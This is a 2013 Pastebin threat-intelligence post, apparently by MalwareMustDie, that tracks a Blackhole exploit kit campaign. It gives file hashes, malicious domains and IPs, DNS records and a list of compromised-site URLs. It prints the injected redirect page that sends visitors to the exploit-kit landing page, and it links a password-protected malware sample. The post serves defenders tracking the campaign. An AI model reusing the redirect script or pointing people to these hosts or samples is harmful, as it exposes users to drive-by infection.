API tools faq
paste
Advertisement
MalwareMustDie

#malwareMustDie - BulletProof .RU ComeBack 2013 -1-

MalwareMustDie
Jan 10th, 2013
1,739
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.28 KB | None | 0 0
raw download clone embed print report
  1. ==============================================================================================
  2. #MalwareMustDie - Monitoring of infection via BHEK at belnialamsik.ru:8080
  3. result: As per today 2013, Jan, 10th = 165infector urls
  4. implemented by same actor/moronz
  5. Source : URLquery:
  6. ===============================================================================================
  7. http://urlquery.net/search.php?q=new.htm&type=string&start=2012-12-26&end=2013-01-10&max=200
  8. ===============================================================================================
  9.  
  10. Analysis, Evidence, PoC References:
  11.  
  12. ===============
  13. LANDING PAGE:
  14. ===============
  15.  
  16. MD5: 597ae3afee1e0b2b3ca77257e5ffb6ff
  17. File size: 112.1 KB ( 114839 bytes )
  18. File name: column.php
  19. File type: HTML
  20. Tags: html
  21. DetectionRatio: 1 / 46
  22. Analysis date: 2013-01-09 14:30:00 UTC ( 21 時間, 5 分 ago )
  23. Url: https://www.virustotal.com/file/58b85549f19db4d9b2996a6ea77b55fe1f8e1150ffb0f5564334f4bfd87fb51b/analysis/1357741800/
  24.  
  25.  
  26. ===============
  27. PAYLOAD:
  28. ===============
  29.  
  30. MD5: ae0bf4502ea084de7f9bee920caed615
  31. File size: 128.0 KB ( 131072 bytes )
  32. File name: wgsdgsdgdsgsd.exe
  33. File type: Win32 EXE
  34. Tags: peexe
  35. DetectionRatio: 15 / 45
  36. Analysis date: 2013-01-09 18:48:25 UTC ( 16 時間, 48 分 ago )
  37. Url: https://www.virustotal.com/file/60c260cf47ba29f39fe295d0ec9c5ad86348792efaa777ff25393350dd328c5c/analysis/
  38.  
  39.  
  40. ===================================
  41. RESEARCH MATERIALS & SAMPLES
  42. ===================================
  43. Analysis + Guide to De-Obfuscating Landing page: https://dl.dropbox.com/u/32230830/MMD-20130108-BHEK-Cridex.txt
  44. Sample: https://t.co/EpTSPeLS (RWR/pwd: infected)
  45.  
  46. =================================================
  47. Landing pafe infector domains record per IP:
  48. =================================================
  49. 91.224.135.20, 187.85.160.106, 82.165.193.26:
  50. belnialamsik.ru
  51. demoralization.ru
  52. bananamamor.ru
  53.  
  54. // additional 11th Jan 2012:
  55. dimanakasono.ru
  56. 212.112.207.15, 91.224.135.20, 187.85.160.106
  57. landing page: h00p://dimanakasono.ru:8080/forum/links/column.php
  58. infector i.e.: h00p://www.gocscloud.com/upload.htm
  59. others: (thx to @adamcaudill)
  60. hXXp://mayerletydeman.com/upload.htm
  61. hXXp://ohotka.info/upload.htm
  62. hXXp://www.calabashpc.org/upload.htm
  63. hXXp://osreumaticos.com/upload.htm
  64.  
  65. //additional 11th jan 2012:
  66. dmeiweilik.ru
  67. Resolving dmeiweilik.ru... 212.112.207.15, 91.224.135.20, 187.85.160.106
  68. Caching dmeiweilik.ru => 212.112.207.15 91.224.135.20 187.85.160.106
  69. Connecting to dmeiweilik.ru|212.112.207.15|:8080... seconds 0.00, connected.
  70.  
  71. ==================================================
  72. RELATED CRIME PATTERN:
  73. ==================================================
  74. Bullet Proof Domains Detected as per 31th Dec 2012 http://pastebin.com/LXJizNGq
  75. Shutdown Domain List up to Dec 23rd 2012 http://pastebin.com/vh1spiCy
  76.  
  77. ====================================
  78. INFECTOR URLS
  79. ===================================
  80.  
  81. // format:
  82.  
  83. <html>
  84. <head>
  85. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  86. <title>Please wait</title>
  87. </head>
  88. <body>
  89. <h2><b>Please wait a moment ... You will be forwarded. </h2></b>
  90. <h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
  91.  
  92. <script>
  93. var1=49;
  94. var2=var1;
  95. if(var1==var2) {document.location="http://belnialamsik.ru:8080/forum/links/column.php";}
  96. </script>
  97.  
  98. </body>
  99. </html>
  100.  
  101. //165 urls so far:
  102.  
  103. h00p://www.ludasokolova.com/new.htm [Russian Federation] 62.109.25.157
  104. h00p://ludasokolova.com/new.htm [Russian Federation] 62.109.25.157
  105. h00p://b2forum.com/new.htm [Romania] 93.115.84.136
  106. h00p://www.m-ps.co.il/new.htm [Israel] 195.28.181.30
  107. h00p://flytrap.pl/new.htm [Poland] 87.98.235.213
  108. h00p://wbm.webmaster31.ru/new.htm [Russian Federation] 62.109.3.19
  109. h00p://www.hd5518.com/new.htm [China] 203.158.16.75
  110. h00p://gdo-cp.ru/new.htm [Russian Federation] 92.38.226.13
  111. h00p://qql.ru/new.htm [Russian Federation] 77.222.61.14
  112. h00p://www.transweld.ru/new.htm [Russian Federation] 77.222.56.86
  113. h00p://exe-conn.com/new.htm [United States] 66.40.52.178
  114. h00p://quizzmania.avalonserver.org/new.htm [France] 91.121.105.25
  115. h00p://cs-mouse.pl/new.htm [Poland] 188.116.20.101
  116. h00p://loadgame.cl/new.htm [United States] 108.170.57.138
  117. h00p://ludasokolova.com/new.htm [Russian Federation] 62.109.25.157
  118. h00p://woodboard.by/new.htm [Belarus] 86.57.246.177
  119. h00p://tv10000.com/new.htm [China] 203.158.16.38
  120. h00p://www.ludasokolova.com/new.htm [Russian Federation] 62.109.25.157
  121. h00p://forum.pro-civic.ru/new.htm [Russian Federation] 188.120.246.238
  122. h00p://svajoniualbumas.lt/new.htm [Lithuania] 79.98.24.13
  123. h00p://gdo-cp.ru/new.htm [Russian Federation] 92.38.226.13
  124. h00p://i-area.ru/new.htm [Russian Federation] 37.140.192.31
  125. h00p://www.debtadviceunit.co.uk/new.htm [United Kingdom] 212.84.65.117
  126. h00p://aim.ug/new.htm [United States] 174.123.87.162
  127. h00p://bartine.com/new.htm [United States] 69.163.133.96
  128. h00p://i-rider.ru/new.htm [Russian Federation] 37.140.192.31
  129. h00p://www.twstech.com/new.htm [United States] 98.129.229.144
  130. h00p://degiraproducciones.com/new.htm [Spain] 184.173.247.226
  131. h00p://omegaportal.ru/new.htm [Russian Federation] 81.177.141.71
  132. h00p://www.havboat.no/new.htm [Norway] 217.65.224.235
  133. h00p://www.greekorthodoxchurchbuffalo.org/new.htm [United States] 98.129.229.190
  134. h00p://ad-astra.name/new.htm [Russian Federation] 77.222.40.63
  135. h00p://benjamin.bikeboom.com/new.htm [United States] 69.163.165.196
  136. h00p://pb.hssl.ie/new.htm [Ireland] 149.5.32.20
  137. h00p://www.loadgame.cl/new.htm [United States] 108.170.57.138
  138. h00p://betatur.ru/new.htm [Russian Federation] 85.249.230.167
  139. h00p://tuto-online.com/new.htm [Germany] 82.165.2.173
  140. h00p://brpclub.ru/new.htm [Russian Federation] 89.253.250.131
  141. h00p://www.lcgroup.lt/new.htm [Lithuania] 79.98.24.11
  142. h00p://foro.federacionasturianaairsoft.com/new.htm [Romania] 188.241.116.178
  143. h00p://forum.gs.nixl.net/new.htm [Germany] 46.4.197.121
  144. h00p://mebforum.ru/new.htm [Russian Federation] 92.53.123.104
  145. h00p://vsv-net.update.ch/new.htm [Switzerland] 217.150.250.146
  146. h00p://vgfreeimarket.com/new.htm [Ukraine] 194.28.172.71
  147. h00p://www.flixxy.com/new.htm [United States] 74.208.166.78
  148. h00p://home-bzview.info/new.htm [United States] 50.87.134.191
  149. h00p://www.leijenhorst.nl/new.htm [Netherlands] 85.92.147.241
  150. h00p://brpclub.ru/new.htm [Russian Federation] 89.253.250.131
  151. h00p://wbm.webmaster31.ru/new.htm [Russian Federation] 62.109.3.19
  152. h00p://tuto-online.com/new.htm [Germany] 82.165.2.173
  153. h00p://silentsoldiers.ru/new.htm [Russian Federation] 91.106.201.69
  154. h00p://m-group56.ru/new.htm [Russian Federation] 77.222.56.114
  155. h00p://lutchman.com/new.htm [United States] 74.220.207.109
  156. h00p://betatur.ru/new.htm [Russian Federation] 85.249.230.167
  157. h00p://scottishterriersherbrooke.com/new.htm [United States] 173.255.238.41
  158. h00p://www.norolo.com.br/new.htm [Brazil] 187.17.98.154
  159. h00p://www.loadgame.cl/new.htm [United States] 108.170.57.138
  160. h00p://pb.hssl.ie/new.htm [Ireland] 149.5.32.20
  161. h00p://romka111.myjino.ru/new.htm [Russian Federation] 81.177.141.71
  162. h00p://benjamin.bikeboom.com/new.htm [United States] 69.163.165.196
  163. h00p://taxi-allians.se/new.htm [Sweden] 91.123.193.54
  164. h00p://i-rider.ru/new.htm [Russian Federation] 37.140.192.31
  165. h00p://karesar.unimagroup.ru/new.htm [Germany] 213.239.214.68
  166. h00p://silentsoldiers.ru/new.htm [Russian Federation] 91.106.201.69
  167. h00p://ad-astra.name/new.htm [Russian Federation] 77.222.40.63
  168. h00p://www.greekorthodoxchurchbuffalo.org/new.htm [United States] 98.129.229.190
  169. h00p://www.havboat.no/new.htm [Norway] 217.65.224.235
  170. h00p://nautorpharma.com/new.htm [United States] 50.57.114.42
  171. h00p://dobroprom.ru/new.htm [Russian Federation] 81.177.6.141
  172. h00p://cress-spb.ru/new.htm [Russian Federation] 188.65.208.66
  173. h00p://shinom.ru/new.htm [Russian Federation] 188.65.208.66
  174. h00p://www.oddbusiness.no/new.htm [Norway] 217.65.224.235
  175. h00p://www.tvhnorby.se/new.htm [Denmark] 46.30.211.55
  176. h00p://omegaportal.ru/new.htm [Russian Federation] 81.177.141.71
  177. h00p://i-area.ru/new.htm [Russian Federation] 37.140.192.31
  178. h00p://www.consolasperu.com/new.htm [United States] 69.89.31.103
  179. h00p://uzktjm.uz/new.htm [Russian Federation] 78.110.50.148
  180. h00p://mon.game-serv.net/new.htm [Russian Federation] 93.170.76.98
  181. h00p://www.azaleaink.com/new.htm [China] 218.247.81.28
  182. h00p://degiraproducciones.com/new.htm [Spain] 184.173.247.226
  183. h00p://promoworksnigeria.com/new.htm [United Kingdom] 109.75.163.174
  184. h00p://elit-hotels.ru/new.htm [Russian Federation] 188.65.208.66
  185. h00p://ondirect.pixillionserver.co.uk/new.htm [United Kingdom] 87.237.69.104
  186. h00p://www.twstech.com/new.htm [United States] 98.129.229.144
  187. h00p://cospringsgroup.com/new.htm [United States] 69.163.218.103
  188. h00p://www.transweld.ru/new.htm [Russian Federation] 77.222.56.86
  189. h00p://qql.ru/new.htm [Russian Federation] 77.222.61.14
  190. h00p://static.terrarium.com.pl/new.htm [Poland] 87.98.235.213
  191. h00p://www.art-vitrag.com/new.htm [Russian Federation] 62.152.59.174
  192. h00p://www.tkarub.com/new.htm [United Arab Emirates] 70.87.29.6
  193. h00p://porter3.ru/new.htm [Russian Federation] 92.53.98.11
  194. h00p://aim.ug/new.htm [United States] 174.123.87.162
  195. h00p://bartine.com/new.htm [United States] 69.163.133.96
  196. h00p://www.hd5518.com/new.htm [China] 203.158.16.75
  197. h00p://flytrap.pl/new.htm [Poland] 87.98.235.213
  198. h00p://exe-conn.com/new.htm [United States] 66.40.52.178
  199. h00p://warheadhosting.com/new.htm [United States] 108.175.4.233
  200. h00p://foro.federacionasturianaairsoft.com/new.htm [Romania] 188.241.116.178
  201. h00p://pod-nami.ru/new.htm [Russian Federation] 91.218.228.60
  202. h00p://www.debtadviceunit.co.uk/new.htm [United Kingdom] 212.84.65.117
  203. h00p://norway-info.ru/new.htm [Russian Federation] 188.65.208.66
  204. h00p://chambresherbrooke.com/new.htm [United States] 173.255.238.41
  205. h00p://gdo-cp.ru/new.htm [Russian Federation] 92.38.226.13
  206. h00p://www.jiapan.net/new.htm [China] 203.158.16.38
  207. h00p://reflectioncenter.org/new.htm [United States] 67.205.57.213
  208. h00p://www.vectra-air.ru/new.htm [Russian Federation] 81.177.25.130
  209. h00p://tv10000.com/new.htm [China] 203.158.16.38
  210. h00p://loadgame.cl/new.htm [United States] 108.170.57.138
  211. h00p://woodboard.by/new.htm [Belarus] 86.57.246.177
  212. h00p://ludasokolova.com/new.htm [Russian Federation] 62.109.25.157
  213. h00p://forum.pro-civic.ru/new.htm [Russian Federation] 188.120.246.238
  214. h00p://www.kievbuild.net/new.htm [Germany] 78.47.82.43
  215. h00p://svajoniualbumas.lt/new.htm [Lithuania] 79.98.24.13
  216. h00p://kievbuild.net/new.htm [Germany] 78.47.82.43
  217. h00p://www.ludasokolova.com/new.htm [Russian Federation] 62.109.25.157
  218. h00p://www.ek-llc.ru/new.htm [Russian Federation] 81.177.25.130
  219. h00p://www.stadiumnightclub.ru/new.htm [Russian Federation] 89.111.177.192
  220. h00p://karesar.unimagroup.ru/new.htm [Germany] 213.239.214.68
  221. h00p://silentsoldiers.ru/new.htm [Russian Federation] 91.106.201.69
  222. h00p://lichno.net/new.htm [Bulgaria] 91.191.214.186
  223. h00p://wbm.webmaster31.ru/new.htm [Russian Federation] 62.109.3.19
  224. h00p://ascendence.net/new.htm [United States] 74.208.232.37
  225. h00p://cs-mouse.pl/new.htm [Poland] 188.116.20.101
  226. h00p://quizzmania.avalonserver.org/new.htm [France] 91.121.105.25
  227. h00p://strekozastrip.ru/new.htm [Russian Federation] 81.222.215.134
  228. h00p://disco80.su/new.htm [Russian Federation] 195.24.65.80
  229. h00p://www.m-ps.co.il/new.htm [Israel] 195.28.181.30
  230. h00p://www.simulatorgame.ir/new.htm [United States] 173.45.101.251
  231. h00p://test.fribytarna.fi/new.htm [Finland] 194.136.187.231
  232. h00p://bartine.com/new.htm [United States] 69.163.133.96
  233. h00p://forum.gs.nixl.net/new.htm [Germany] 46.4.197.121
  234. h00p://siui-dv.ru/new.htm [Russian Federation] 92.53.123.104
  235. h00p://bulleetbaluchon.org/new.htm [United States] 173.255.238.41
  236. h00p://www.initiationdegustationvin.fr/new.htm [United Kingdom] 80.169.210.33
  237. h00p://job-new.ru/new.htm [Russian Federation] 77.222.61.14
  238. h00p://romka111.myjino.ru/new.htm [Russian Federation] 81.177.141.71
  239. h00p://iksserver.altervista.org/new.htm [Germany] 213.133.109.72
  240. h00p://www.kievbuild.net/new.htm [Germany] 78.47.82.43
  241. h00p://www.chronischezorgantwerpenberchem.be/new.htm [Netherlands] 188.93.150.34
  242. h00p://job-new.ru/new.htm [Russian Federation] 77.222.61.14
  243. h00p://download.ll-b.net/new.htm [United States] 67.205.62.175
  244. h00p://test.fribytarna.fi/new.htm [Finland] 194.136.187.231
  245. h00p://kubsnab.ru/new.htm [Russian Federation] 195.208.1.108
  246. h00p://psp-team.giery.eu/new.htm [Germany] 80.237.210.112
  247. h00p://upliftinglivestoday.org/new.htm [United States] 204.15.179.43
  248. h00p://degiraproducciones.com/new.htm [Spain] 184.173.247.226
  249. h00p://b2forum.com/new.htm [Romania] 93.115.84.136
  250. h00p://cs.czteam.ro/new.htm [Romania] 194.42.102.203
  251. h00p://www.cabn.info/new.htm [United Kingdom] 88.208.252.193
  252. h00p://lichno.net/new.htm [Bulgaria] 91.191.214.186
  253. h00p://forum.gs.nixl.net/new.htm [Germany] 46.4.197.121
  254. h00p://mebforum.ru/new.htm [Russian Federation] 92.53.123.104
  255. h00p://siui-dv.ru/new.htm [Russian Federation] 92.53.123.104
  256. h00p://iksserver.altervista.org/new.htm [Germany] 213.133.109.72
  257. h00p://www.one-emu.fr/new.htm [France] 80.248.211.37
  258. h00p://4dceramics.com/new.htm [United States] 173.254.28.58
  259. h00p://pico.byteangle.com/new.htm [United States] 54.235.215.87
  260. h00p://puyallupadventurebootcamp.com/new.htm [United States] 69.61.11.243
  261. h00p://pico.byteangle.com/new.htm [United States] 54.235.215.87
  262. h00p://kubsnab.ru/new.htm [Russian Federation] 195.208.1.108
  263. h00p://www.one-emu.fr/new.htm [France] 80.248.211.37
  264. h00p://vsv-net.update.ch/new.htm [Switzerland] 217.150.250.146
  265. h00p://tv10000.com/new.htm [China] 203.158.16.38
  266. h00p://taxi-allians.se/new.htm [Sweden] 91.123.193.54
  267. h00p://pico.byteangle.com/new.htm [United States] 54.235.215.87
  268.  
  269.  
  270. ========================
  271. INFECTOR NETWORK DNS
  272. =======================
  273.  
  274. belnialamsik.ru. 59 IN SOA ns1.belnialamsik.ru. root.belnialamsik.ru. 2012010101 604800 1800 1800 60
  275.  
  276.  
  277. belnialamsik.ru. 59 IN A 91.224.135.20
  278. belnialamsik.ru. 59 IN A 187.85.160.106
  279. belnialamsik.ru. 59 IN A 82.165.193.26
  280.  
  281. belnialamsik.ru. 59 IN NS ns10.belnialamsik.ru.
  282. belnialamsik.ru. 59 IN NS ns8.belnialamsik.ru.
  283. belnialamsik.ru. 59 IN NS ns7.belnialamsik.ru.
  284. belnialamsik.ru. 59 IN NS ns12.belnialamsik.ru.
  285. belnialamsik.ru. 59 IN NS ns9.belnialamsik.ru.
  286. belnialamsik.ru. 59 IN NS ns11.belnialamsik.ru.
  287. belnialamsik.ru. 59 IN NS ns1.belnialamsik.ru.
  288. belnialamsik.ru. 59 IN NS ns2.belnialamsik.ru.
  289. belnialamsik.ru. 59 IN NS ns15.belnialamsik.ru.
  290. belnialamsik.ru. 59 IN NS ns5.belnialamsik.ru.
  291. belnialamsik.ru. 59 IN NS ns14.belnialamsik.ru.
  292. belnialamsik.ru. 59 IN NS ns3.belnialamsik.ru.
  293. belnialamsik.ru. 59 IN NS ns4.belnialamsik.ru.
  294. belnialamsik.ru. 59 IN NS ns6.belnialamsik.ru.
  295. belnialamsik.ru. 59 IN NS ns13.belnialamsik.ru.
  296.  
  297. ns1.belnialamsik.ru. 3561 IN A 62.76.186.24
  298. ns2.belnialamsik.ru. 3561 IN A 41.168.5.140
  299. ns3.belnialamsik.ru. 3561 IN A 42.121.116.38
  300. ns4.belnialamsik.ru. 3561 IN A 110.164.58.250
  301. ns5.belnialamsik.ru. 3561 IN A 210.71.250.131
  302. ns6.belnialamsik.ru. 22 IN A 110.164.58.250
  303. ns7.belnialamsik.ru. 22 IN A 41.168.5.140
  304. ns8.belnialamsik.ru. 22 IN A 62.76.186.24
  305. ns9.belnialamsik.ru. 22 IN A 209.51.221.247
  306. ns10.belnialamsik.ru. 22 IN A 187.85.160.106
  307. ns11.belnialamsik.ru. 22 IN A 163.10.12.83
  308. ns12.belnialamsik.ru. 22 IN A 216.99.149.226
  309.  
  310. ==============================
  311. OTTHER DOMAINS ALIVE POC
  312. ==============================
  313.  
  314. ; <<>> DiG 9.8.1-P1 <<>> demoralization.ru
  315. ;; global options: +cmd
  316. ;; Got answer:
  317. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4808
  318. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 15, ADDITIONAL: 10
  319.  
  320. ;; QUESTION SECTION:
  321. ;demoralization.ru. IN A
  322.  
  323. ;; ANSWER SECTION:
  324. demoralization.ru. 60 IN A 91.224.135.20
  325. demoralization.ru. 60 IN A 187.85.160.106
  326.  
  327. ;; AUTHORITY SECTION:
  328. demoralization.ru. 60 IN NS ns6.demoralization.ru.
  329. demoralization.ru. 60 IN NS ns1.demoralization.ru.
  330. demoralization.ru. 60 IN NS ns8.demoralization.ru.
  331. demoralization.ru. 60 IN NS ns2.demoralization.ru.
  332. demoralization.ru. 60 IN NS ns3.demoralization.ru.
  333. demoralization.ru. 60 IN NS ns15.demoralization.ru.
  334. demoralization.ru. 60 IN NS ns13.demoralization.ru.
  335. demoralization.ru. 60 IN NS ns4.demoralization.ru.
  336. demoralization.ru. 60 IN NS ns11.demoralization.ru.
  337. demoralization.ru. 60 IN NS ns14.demoralization.ru.
  338. demoralization.ru. 60 IN NS ns5.demoralization.ru.
  339. demoralization.ru. 60 IN NS ns7.demoralization.ru.
  340. demoralization.ru. 60 IN NS ns9.demoralization.ru.
  341. demoralization.ru. 60 IN NS ns10.demoralization.ru.
  342. demoralization.ru. 60 IN NS ns12.demoralization.ru.
  343.  
  344. ;; ADDITIONAL SECTION:
  345. ns1.demoralization.ru. 3600 IN A 62.76.186.24
  346. ns2.demoralization.ru. 3600 IN A 41.168.5.140
  347. ns3.demoralization.ru. 3600 IN A 42.121.116.38
  348. ns4.demoralization.ru. 3600 IN A 110.164.58.250
  349. ns5.demoralization.ru. 3600 IN A 210.71.250.131
  350. ns6.demoralization.ru. 60 IN A 110.164.58.250
  351. ns7.demoralization.ru. 60 IN A 41.168.5.140
  352. ns8.demoralization.ru. 60 IN A 62.76.186.24
  353. ns9.demoralization.ru. 60 IN A 209.51.221.247
  354. ns10.demoralization.ru. 60 IN A 187.85.160.106
  355.  
  356. ; <<>> DiG 9.8.1-P1 <<>> bananamamor.ru
  357. ;; global options: +cmd
  358. ;; Got answer:
  359. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20611
  360. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 15, ADDITIONAL: 10
  361.  
  362. ;; QUESTION SECTION:
  363. ;bananamamor.ru. IN A
  364.  
  365. ;; ANSWER SECTION:
  366. bananamamor.ru. 60 IN A 187.85.160.106
  367. bananamamor.ru. 60 IN A 91.224.135.20
  368.  
  369. ;; AUTHORITY SECTION:
  370. bananamamor.ru. 60 IN NS ns14.bananamamor.ru.
  371. bananamamor.ru. 60 IN NS ns13.bananamamor.ru.
  372. bananamamor.ru. 60 IN NS ns11.bananamamor.ru.
  373. bananamamor.ru. 60 IN NS ns12.bananamamor.ru.
  374. bananamamor.ru. 60 IN NS ns6.bananamamor.ru.
  375. bananamamor.ru. 60 IN NS ns10.bananamamor.ru.
  376. bananamamor.ru. 60 IN NS ns3.bananamamor.ru.
  377. bananamamor.ru. 60 IN NS ns2.bananamamor.ru.
  378. bananamamor.ru. 60 IN NS ns4.bananamamor.ru.
  379. bananamamor.ru. 60 IN NS ns9.bananamamor.ru.
  380. bananamamor.ru. 60 IN NS ns15.bananamamor.ru.
  381. bananamamor.ru. 60 IN NS ns8.bananamamor.ru.
  382. bananamamor.ru. 60 IN NS ns5.bananamamor.ru.
  383. bananamamor.ru. 60 IN NS ns7.bananamamor.ru.
  384. bananamamor.ru. 60 IN NS ns1.bananamamor.ru.
  385.  
  386. ;; ADDITIONAL SECTION:
  387. ns1.bananamamor.ru. 3600 IN A 62.76.186.24
  388. ns2.bananamamor.ru. 3600 IN A 41.168.5.140
  389. ns3.bananamamor.ru. 3600 IN A 42.121.116.38
  390. ns4.bananamamor.ru. 3600 IN A 110.164.58.250
  391. ns5.bananamamor.ru. 3600 IN A 210.71.250.131
  392. ns6.bananamamor.ru. 60 IN A 110.164.58.250
  393. ns7.bananamamor.ru. 60 IN A 41.168.5.140
  394. ns8.bananamamor.ru. 60 IN A 62.76.186.24
  395. ns9.bananamamor.ru. 60 IN A 209.51.221.247
  396. ns10.bananamamor.ru. 60 IN A 187.85.160.106
  397.  
  398. ----
  399. @unixfreaxjp ~]$ date
  400. Thu Jan 10 20:41:22 JST 2013
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!